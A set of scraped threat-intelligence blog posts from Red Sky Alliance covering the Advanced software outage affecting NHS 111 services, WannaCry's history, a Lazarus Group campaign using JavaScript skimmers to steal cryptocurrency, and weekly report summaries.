<p>Advanced said it will bring its NHS 111 and urgent care services back online 'within the next few days.' But it could take another month before Carenotes EPR is back online. Advanced said: 'We are working tirelessly to bring this timeline forward, and while we are hopeful to do so, we want our customers to be prepared. We will continue to provide updates as we make progress.”</p>
<p>Carenotes EPR is used by at least nine mental health trusts, and dozens of other trusts use different software from the company that is still offline. Affected NHS 111 call handlers currently do not have access to the GP records or NHS numbers of people ringing the non-emergency service. They are also unable to make electronic bookings with GPs or send out ambulances for patients while the Adastra software is still offline.</p>
<p>An Advanced spokesperson said: 'We want to stress that there is nothing to suggest that our customers are at risk of malware spread and believe that early intervention from our Incident Response Team contained this issue to a small number of servers. Since our Health and Care systems were isolated at the end of last week, no further issues have been detected and our security monitoring continues to confirm that the incident is contained, allowing our recovery activities to move forward.”</p>
<p>The NHS attack was initially feared by experts to be from another country. Health chiefs told hospitals to shore up their system earlier this year amid fears of a Russian attack in retaliation to Western interference in the war in Ukraine. There have been widespread concerns about the technological resilience of the NHS which only last year stopped using fax machines. It was famously hacked in 2017 in the WannaCry attack, which brought the whole health service to a standstill for days and cost the UK £92million. </p>
<p>More than a third of UK hospital trusts had their systems crippled in the WannaCry ransomware attack in May 2017. Nearly 20,000 hospital appointments were cancelled because the NHS failed to provide basic security against cyber attackers. NHS officials claimed 47 trusts were affected – but the National Audit Office (NAO) found the impact was far greater, and in fact 81 were hit by the attack. When the attack started on 12 May, it ripped traveled through the out-of-date defenses used by the NHS. More than a third of hospital trusts had their systems crippled in the WannaCry ransomware attack last May (2021). The virus, which spread via email, locked staff out of their computers and demanded £230 to release the files on each employee account. Hospital staff reported seeing computers go down 'one by one' as the attack took hold. Locked out medics had to rely on pen and paper, while crucial equipment such as MRI machines were also disabled by the attack. The report reveals nearly 19,500 medical appointments were cancelled, including 139 potential cancer referrals. Five hospitals even had to divert ambulances away at the peak of the crisis. Hospitals were found to have been running out-of-date computer systems, such as Windows XP and Windows 7, that had not been updated to secure them against such attacks. Computers at almost 600 GP surgeries were also victims. Cyber experts said the cyber-attack could have easily been prevented. Officials were warned repeatedly about the WannaCry virus beforehand. </p>
<p>The Department of Health said that from January 2018 hospitals will be subject to unannounced inspections of IT security. I guess it did was not enough to prevent this current attack. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www. wapacklabs. com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://news.sky.com/story/ministers-coordinating-resilience-response-after-major-cyber-attack-hits-nhs-systems-across-uk-12666611">https://news.sky.com/story/ministers-coordinating-resilience-response-after-major-cyber-attack-hits-nhs-systems-across-uk-12666611</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://www.dailymail.co.uk/health/article-11102003/NHS-cyber-attack-Hackers-issue-demands-supplier.html">https://www.dailymail.co.uk/health/article-11102003/NHS-cyber-attack-Hackers-issue-demands-supplier.html</a></p></div>Weekly Report - All Sector 11 19 2021https://redskyalliance.org/xindustry/weekly-report-all-sector-11-19-20212021-11-19T13:55:16.000Z2021-11-19T13:55:16.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}9824409479,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}9824409479,RESIZE_400x{{/staticFileLink}}" width="250" alt="9824409479?profile=RESIZE_400x" /></a>Activity Summary - Week Ending on 19 November 2021:</h2>
<ul>
<li>Red Sky Alliance identified 22,393 connections from new IP’s checking in with our Sinkholes</li>
<li>Analysts identified 5,918 new IP addresses participating in various Botnets</li>
<li>Firsttheberg.net in France has a Compromised IP</li>
<li>MBR Attacks</li>
<li>Abcbot Linux Malware</li>
<li>FatPipe</li>
<li>Not Just the CISOs Problem</li>
<li>Swedish Spoof</li>
<li>The FBI is Cold?</li>
<li>Lazarus Still Around</li>
<li>UK Gamers</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}9824409456,original{{/staticFileLink}}">IR-21-323-001_weekly323.pdf</a></p></div>Lazarus Attackers are Targeting Cryptocurrency Toohttps://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency2021-04-29T20:22:48.000Z2021-04-29T20:22:48.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}8872398281,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8872398281,RESIZE_400x{{/staticFileLink}}" alt="8872398281?profile=RESIZE_400x" width="250" /></a>As more web merchants accept cryptocurrencies, the possibilities for theft and fraud will increase. There will no protections that consumers and businesses have enjoyed that are standard for purchases via credit card. Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB. Group-IB's new report builds on findings published in July 2020 by Dutch security firm Sansec, which reported that malicious infrastructure and in many cases also malware was being used for Magecart-style attack campaigns that had previously been attributed to the Lazarus Group.</p>
<p>During 2020, cyber threat investigators uncovered a global phishing campaign by Lazarus, and their newest data shows this activity continuing well into 2021. Their recent research showed how hackers phished for cryptocurrency via fake LinkedIn job alerts. Hackers targeted crypto talents by mimicking legitimate blockchain job listings. People received messages via LinkedIn with a file that contained malicious code. The purpose of the malware was to fetch credentials that would allow hackers to log in to certain systems and steal the cryptocurrency.</p>
<p>Lazarus, aka Hidden Cobra, Dark Seoul, Guardians of Peace, APT38, Bluenoroff, and a host of other names refers to a group of hackers with apparent ties to the Pyongyang-based government officially known as the Democratic People's Republic of Korea, led by Kim Jong-Un.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Magecart-style attacks refer to criminals stealing payment card data using so-called digital card skimming or scraping tools, aka JavaScript sniffers that they inject into victim organizations' e-commerce sites. Victims of such attacks have included British Airways, jewelry and accessories retailer Claire's, and Ticketmaster UK, among thousands of others.</p>
<p>Sansec is one of the firms that scan the web for signs of Magecart attacks. During 2020, it was noted that while early Magecart attacks were largely the provenance of Russian and Indonesian gangs, the cash-strapped government of North Korea appeared to have joined the fray, bringing a greater degree of sophistication, no doubt in pursuit of large sums.</p>
<p>Researchers noted that after reviewing the attack campaign discovered by Sansec, it also found signs suggesting that attackers had been experimenting not just with stealing payment card data but also cryptocurrency. They report that it found the same infrastructure being used, together with a modified version of the same JavaScript sniffer aka JS-sniffer that Sansec described in its report. Group-IB has dubbed the cryptocurrency-targeting campaign Lazarus BTC Changer. "Combined with the gang's track record of going after crypto, the campaign makes it possible to attribute the attacks to Lazarus with a high level of confidence," says Victor Okorokov, lead threat intelligence analyst at Group-IB, in the research report.</p>
<p>But the cryptocurrency-targeting campaign only appeared to hit a few targets. "While analyzing Lazarus BTC Changer, we identified three compromised websites, two of which were listed in Sansec's article as victims," which are Realchems and Wongs Jewellers, he says. "In the case of Wongs Jewellers, we identified a sample of Lazarus BTC Changer on its website, but we did not find any evidence that the shop accepts cryptocurrency, so the attackers probably added Lazarus BTC Changer to the website by mistake," he says. "The third victim is an Italian luxury clothes shop, but malicious code was removed from the website" before researchers could analyze it.</p>
<p>The attackers appear to have stolen relatively little cryptocurrency via the sites' customers, only $9,000 worth of ethereum and $8,400 worth of bitcoins per investigators.</p>
<p>Group-IB says those stolen funds appeared to have been routed to bitcoin cryptocurrency wallets allegedly owned by CoinPayments.net, "a payment gateway that allows users to conduct transactions involving bitcoin, ethereum, litecoin, and other cryptocurrencies." Lazarus may have used the site to launder the stolen funds by moving them to other cryptocurrency exchanges or wallets.</p>
<p>The cybersecurity firm notes that CoinPayment's "know your customer" policy could help identify the individuals who initiated the transactions. The service's user agreement stipulates that individuals attest that they are not operating in or on behalf of anyone in a prohibited jurisdiction, which includes North Korea.</p>
<p>A spokesman for CoinPayments tells Information Security Media Group: "I'm not sure if there are any tied wallets or not, but we would not be able to comment about any user's personal information outside of legal channels due to privacy laws."</p>
<p>Given the scale of this cryptocurrency-targeting operation, Group-IB says what it's discovered appears to have been a small-scale test run, adding that the Lazarus Group often runs smaller trials before launching larger campaigns. "Users of illicit underground marketplaces seem to be likely targets, where cryptocurrency is the only currency," Stated Viktor Okorokov, Group-IB</p>
<p>"The amount of money stolen was relatively small due to the fact that the Lazarus BTC Changer campaign only targeted three small e-commerce stores that remained infected for a limited period of time, less than three months," Okorokov reported. "The campaign, however, marks the first time that Lazarus used malicious JS-sniffers to steal cryptocurrency. It’s definitely something that deserves attention as the technique has all the potential to grow in scale and sophistication, given the gang’s continued hunt for cryptocurrency."</p>
<p>When attackers target payment cards, they can often monetize the effort by selling the stolen card data on cybercrime forums and markets. Why would hackers bother to target the small number of sites that accept cryptocurrency, or individuals willing to pay using virtual currencies?</p>
<p>"Cryptocurrency payments are not as widespread as traditional credit cards in the e-commerce industry. Nonetheless, many big websites do accept cryptocurrency and such attacks can grow in scale, and other gangs can adopt Lazarus’ new technique," Okorokov says. In addition, he says, if an attacker gains control over an e-commerce website's payment portal, it could easily add the ability to pay via cryptocurrency, with the caveat that it would immediately flow into an attacker-controlled wallet. "Adversaries can attack users of the targeted company to steal cryptocurrency directly from them and not from the company by creating fake payment forms or replacing payment details" to route payments to their own wallets, Okorokov said.</p>
<p>Another hot target would be cybercrime marketplaces and forums many of which are now hosted on the darknet or dark web, meaning they can only be reached using the anonymizing Tor browser - that often only facilitate payments between buyers and sellers using bitcoin or monero.</p>
<p>"Users of illicit underground marketplaces seem to be likely targets, where cryptocurrency is the only currency," Okorokov says. "However, the attacks on users of legitimate cryptocurrency exchanges are also possible."</p>
<p>Red Sky Alliance has been analyzing and documenting these types of cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge. Many past tactics are often dusted off and reused in current malicious campaigns. Red Sky Alliance can provide actionable cyber intelligence and weekly blacklists to help protect your network. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com</p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p><strong><br /> Weekly Cyber Intelligence Briefings</strong>:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p></div>INTELLIGENCE REPORT: STATE LEVEL HACKERShttps://redskyalliance.org/xindustry/intelligence-report-state-level-hackers2021-04-16T16:54:30.000Z2021-04-16T16:54:30.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8801927301,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8801927301,RESIZE_400x{{/staticFileLink}}" width="250" alt="8801927301?profile=RESIZE_400x" /></a>Activity Summary - Week Ending 16 April 2021:</h2>
<ul>
<li>Red Sky Alliance observed 58 new unique email accounts compromised with Keyloggers</li>
<li>Analysts identified 30,373 connections from new unique IP addresses</li>
<li>3,512 new IP addresses participating in various Botnets were Observed</li>
<li>Security Researcher under Attack</li>
<li>CISA’s New Tool – Aviary</li>
<li>FormBook Malware</li>
<li>State Sponsored APT</li>
<li>Lazarus and Vyvera</li>
<li>TiT-for-TaT is Never Good</li>
<li>Myanmar and Taiwan Protests</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}8801919698,original{{/staticFileLink}}">IR-21-106-001_weekly_106.pdf</a></p>
<p> </p></div>TACTICAL CYBER REPORT: COMMUNICATIONS SECTORhttps://redskyalliance.org/xindustry/tactical-cyber-report-communications-sector2020-11-25T22:07:29.000Z2020-11-25T22:07:29.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8215461282,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8215461282,RESIZE_400x{{/staticFileLink}}" alt="8215461282?profile=RESIZE_400x" width="250" /></a>Activity Summary - Week Ending 25 November 2020:</h2>
<ul>
<li>Red Sky Alliance observed 106 unique email accounts compromised with Keyloggers</li>
<li>Analysts identified 45,355 connections from new unique IP addresses</li>
<li>Lir Ukraine Llc Compromised C2</li>
<li>Hezbollah Threat Actors remain as the Top Hacking Group</li>
<li>Lazarus is Targeting the Supply Chain</li>
<li>Muhstik Botnet targeting Oracle</li>
<li>Boom!Mobile – Still not Happy</li>
<li>Everyone hang in there, add Oil</li>
<li>To our US Friends – Happy Thanksgiving<br /><br />Link to full report: <a href="{{#staticFileLink}}8217992663,original{{/staticFileLink}}">IR-20-330-001-Tactical Cyber Brief330.pdf</a></li>
</ul></div>